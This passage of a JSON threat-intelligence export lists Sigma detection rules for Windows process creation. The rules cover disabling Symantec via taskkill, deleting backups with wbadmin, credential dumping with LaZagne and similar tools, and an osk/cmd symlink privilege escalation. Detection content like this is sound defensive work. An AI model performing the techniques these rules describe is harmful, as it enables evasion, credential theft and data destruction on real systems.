"description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", "meta": { "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_taskkill_sep.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", "value": "Taskkill Symantec Endpoint Protection" }, { "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-28", "falsepositive": [ "Legitimate piping of the password to anydesk", "Some FP could occur with similar tools that uses the same command line '--set-password'" ], "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", "value": "Remote Access Tool - AnyDesk Piped Password Via CLI" }, { "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_webbrowserpassview.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "value": "PUA - WebBrowserPassView Execution" }, { "description": "Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.\nLaZagne has been leveraged multiple times by threat actors in order to dump credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Some false positive is expected from tools with similar command line flags." ], "filename": "proc_creation_win_hktl_lazagne.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", "https://github.com/AlessandroZ/LaZagne/tree/master", "https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "c2b86e67-b880-4eec-b045-50bc98ef4844", "value": "HackTool - LaZagne Execution" }, { "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_scrcons_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/child-processes/", "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "value": "Script Event Consumer Spawning Process" }, { "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-01", "falsepositive": [ "Legitimate use by a software developer" ], "filename": "proc_creation_win_lolbin_wfc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "value": "Use of Wfc.exe" }, { "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-10", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" }, { "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_delete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "value": "Delete Important Scheduled Task" }, { "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", "meta": { "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "creation_date": "2022-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", "value": "HackTool - Jlaive In-Memory Assembly Execution" }, { "description": "Detects execution of javascript code using \"mshta.exe\".", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_javascript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", "value": "Suspicious JavaScript Execution Via Mshta.EXE" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-12-07", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_netsh_fw_rules_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/netsh.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", "value": "Firewall Configuration Discovery Via Netsh.EXE" }, { "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", "meta": { "author": "Ilya Krestinichev", "creation_date": "2022-11-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "value": "Suspicious Ping/Del Command Combination" }, { "description": "Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.\n", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-05-14", "falsepositive": [ "System administrator activities" ], "filename": "proc_creation_win_registry_special_accounts_hide_user.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/", "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml" ], "tags": [ "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ec9fb1b-e059-4489-9642-f270c207923d", "value": "Hiding User Account Via SpecialAccounts Registry Key - CommandLine" }, { "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "meta": { "author": "frack113", "creation_date": "2021-07-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "value": "Windows Defender Definition Files Removed" }, { "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "meta": { "author": "frack113", "creation_date": "2022-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://ss64.com/nt/mklink.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9b61244-893f-427c-b287-3e708f321c6b", "value": "Potential Privilege Escalation Using Symlink Between Osk and Cmd" }, { "description": "Detects a when net.exe is called with a password in the command line", "meta": { "author": "Tim Shelton (HAWK.IO)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_password_plaintext.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml" ], "tags": [ "attack.defense-evasion", "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1078" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4498716-1d52-438f-8084-4a603157d131", "value": "Password Provided In Command Line Of Net.EXE" }, { "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.credential-access", "attack.discovery", "attack.t1047", "attack.t1053", "attack.t1059.003", "attack.t1059.001", "attack.t1110", "attack.t1201" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", "value": "HackTool - CrackMapExec Execution" }, { "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_open_command.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_open_command.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "value": "Suspicious Reg Add Open Command" }, { "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", "meta": { "author": "elhoim, CD_ROM_", "creation_date": "2022-04-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_spawn_explorer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "value": "RunDLL32 Spawning Explorer" }, { "description": "Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_delete_all_backups.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "639c9081-f482-47d3-a0bd-ddee3d4ecd76", "value": "All Backups Deleted Via Wbadmin.EXE" }, { "description": "Detects the use of Advanced Port Scanner.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Legitimate administrative use", "Tools with similar commandline (very rare)" ], "filename": "proc_creation_win_pua_advanced_port_scanner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046", "attack.t1135" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", "value": "PUA - Advanced Port Scanner Execution" }, { "description": "Detects the execution of SecurityXploded Tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-12-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_secutyxploded.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securityxploded.com/", "https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml" ], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "value": "HackTool - SecurityXploded Execution" }, { "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", "meta": { "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_remote_debugging.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" ], "tags": [ "attack.credential-access", "attack.t1185" ] }, "related": [ { "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "value": "Browser Started with Remote Debugging" }, { "description": "Detects the execution of a renamed Microsoft Teams binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_msteams.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msteams.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "88f46b67-14d4-4f45-ac2c-d66984f22191", "value": "Renamed Microsoft Teams Execution" }, { "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-22", "falsepositive": [ "Software that illegally integrates MegaSync in a renamed form", "Administrators that have renamed MegaSync" ], "filename": "proc_creation_win_renamed_megasync.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/rclone-mega-extortion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "value": "Renamed MegaSync Execution" }, { "description": "Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\nAutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\nAttackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-06-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_autoit.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.autoitscript.com/site/", "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4264e47-f522-4c38-a420-04525d5b880f", "value": "Renamed AutoIt Execution" }, { "description": "Detects execution of LiveKD based on PE metadata or image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Administration and debugging activity (must be investigated)" ], "filename": "proc_creation_win_sysinternals_livekd_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a85f7765-698a-4088-afa0-ecfbf8d01fa4", "value": "Potential Memory Dumping Activity Via LiveKD" }, { "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", "meta": { "author": "frack113", "creation_date": "2022-04-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_embedding.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" ], "tags": [ "attack.t1218.007", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", "value": "Suspicious MsiExec Embedding Parent" }, { "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_kavremover_uncommon_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": 